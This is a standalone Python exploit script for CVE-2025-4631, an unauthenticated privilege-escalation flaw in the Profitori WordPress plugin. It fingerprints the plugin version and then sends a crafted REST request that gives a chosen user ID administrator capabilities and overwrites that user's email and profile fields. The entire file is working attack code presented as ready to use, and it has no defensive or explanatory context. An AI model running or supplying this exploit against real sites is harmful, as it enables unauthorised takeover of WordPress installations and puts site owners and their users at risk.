#!/usr/bin/env python3 import argparse import requests import json import time from urllib.parse import urljoin import re # By : Khaled Alenazi (Nxploited) # Disable SSL warnings requests.packages.urllib3.disable_warnings() # Setup argument parser parser = argparse.ArgumentParser( description="๐Ÿšจ Exploit for CVE-2025-4631 - Unauthenticated Privilege Escalation in Profitori Plugin\n# By Nxploited (Khaled Alenazi)" ) parser.add_argument("-u", "--url", required=True, help="๐ŸŒ Target base URL (e.g., http://example.com/wordpress)") parser.add_argument("-id", required=True, type=int, help="๐Ÿ†” User ID to escalate (must exist)") parser.add_argument("--email", default="admin@hacked.com", help="๐Ÿ“ง Fake user email (optional)") parser.add_argument("--name", default="Nxploited", help="๐Ÿ‘ค Display name (optional)") parser.add_argument("--url_field", default="https://github.com/Nxploited/", help="๐Ÿ”— User profile URL (optional)") parser.add_argument("--verbose", action="store_true", help="๐Ÿ” Enable verbose output and print JSON details") args = parser.parse_args() # Set custom session with User-Agent session = requests.Session() session.headers.update({ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", "Content-Type": "application/json" }) session.verify = False # Check version readme_url = args.url.rstrip("/") + "/wp-content/plugins/profitori/readme.txt" print(f"[๐Ÿ“„] Checking plugin version at: {readme_url}") try: resp = session.get(readme_url) if resp.status_code == 200: match = re.search(r"Stable tag:\s*(2\.0\.6\.0|2\.1\.1\.3)", resp.text) if match: print(f"[โœ…] Vulnerable version detected: {match.group(1)}") print("[๐Ÿš€] Exploiting in 3 seconds...") time.sleep(3) else: print("[๐Ÿ›ก๏ธ] Plugin version is not vulnerable. Exiting.") exit() else: print("[โš ๏ธ] Version check failed (readme.txt not found), attempting exploit anyway...") except Exception as e: print(f"[โš ๏ธ] Error fetching version info: {e}\n[โณ] Proceeding with exploitation...") # Build payload payload = [ { "_datatype": "users", "id": args.id, "wp_capabilities": "a:1:{s:13:\"administrator\";b:1;}", "user_email": args.email, "display_name": args.name, "user_url": args.url_field } ] # Manually build API endpoint endpoint = args.url.rstrip("/") + "/wp-json/stocktend/v1/stocktend_object" print(f"[๐Ÿ“ก] Sending privilege escalation request to: {endpoint}") try: response = session.post(endpoint, data=json.dumps(payload)) if response.status_code == 200: print("[๐ŸŽฏ] Exploit completed successfully!\n") try: parsed = response.json() print("[๐Ÿงพ] Updated User Information:") for user in parsed: print("--------------------------------------") print(f"๐Ÿ†” User ID : {user.get('id')}") print(f"๐Ÿ‘ค Username : {user.get('user_login')}") print(f"๐Ÿ“ง Email : {user.get('user_email')}") print(f"๐Ÿชช Display Name : {user.get('display_name')}") print(f"๐Ÿ”— User URL : {user.get('user_url')}") print(f"๐Ÿ›ก๏ธ Role Raw : {user.get('wp_capabilities')}\n") except Exception as json_err: print("[โŒ] Could not parse JSON response:", str(json_err)) if args.verbose: print("[Verbose JSON]\n", response.text) print("[๐Ÿ‘‘] Exploit By : Nxploited (Khaled_alenazi)") print("๐Ÿ”— GitHub : https://github.com/Nxploited") print("๐Ÿ“ง Email : NxploitBot@gmal.com") else: print(f"[โŒ] Exploit failed. HTTP Status: {response.status_code}") if args.verbose: print("[Verbose Response]\n", response.text) except Exception as e: print(f"[๐Ÿ”ฅ] Error during request: {e}")